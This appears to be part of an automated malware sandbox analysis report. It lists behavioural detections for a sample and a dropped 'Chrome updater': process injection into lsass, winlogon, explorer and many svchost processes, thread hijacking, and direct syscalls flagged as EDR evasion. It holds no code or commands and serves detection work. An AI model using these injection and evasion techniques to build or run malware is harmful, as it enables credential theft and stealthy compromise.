Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A9ED2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 731C2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4E8C2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 47B62908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 70092908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 84292908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: D3FA2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A4152908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: BDF32908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: C0262908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: C9F32908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 645B2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 7B2A2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4F62908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 2AB42908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4ADB2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\spoolsv.exe EIP: 1992908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 25DA2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F5352908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F0D62908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: FFB2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C2572908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8BCF2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 66982908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 13EF2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8D572908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 69B42908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CC742908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5DA72908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 199D2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F3892908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3B82908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 40E42908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A6532908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 27BC2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7B152908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 621A2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2F482908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8B4B2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 683D2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1382908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2E262908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6C5E2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D5932908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FC652908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 78742908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 33B42908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8D0A2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AB4C2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2A642908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6CF32908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 49352908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 60DA2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5E7B2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2F7C2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E8152908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 52342908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9DA92908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 602E2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 197C2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F1A02908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BE342908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 23A12908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FD902908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C2A32908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B2662908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2C892908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 8E642908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 24892908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A2282908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A22E2908

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	NtAdjustPrivilegesToken: Direct from: 0x7FF750F65BFE			Jump to behavior
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	NtQuerySystemInformation: Direct from: 0x7FF6A0405BFE			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAE260000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B380000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C1A0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC670000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0B10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A661330000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAED80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87F40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 179537D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D590000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25306E90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B940000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADECD70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D5590A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD731C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B47B60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20870090000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17184290000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166980000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 1380000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F4197C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F8F1A00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 228BE340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 20823A10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FDFD900000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25CC2A30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 144B2660000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CF49670000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1988E640000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F724890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 222A2280000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 222A22E0000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dialer.exe

Memory written: PID: 2580 base: 1380000 value: 4D

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Thread register set: target process: 5796	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Thread register set: target process: 6252	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Thread register set: target process: 6208	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Thread register set: target process: 1668	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Memory written: C:\Windows\System32\dialer.exe base: 25C231F010	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAE260000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B380000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C1A0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B3F0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: EF5FC0B010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 2549FAF010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 6F4E4CF010	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC670000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0B10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A661330000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAED80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87F40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 179537D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D590000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25306E90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B940000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADECD70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D5590A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9ED0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD731C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E8C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B47B60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20870090000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17184290000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166980000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 1380000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
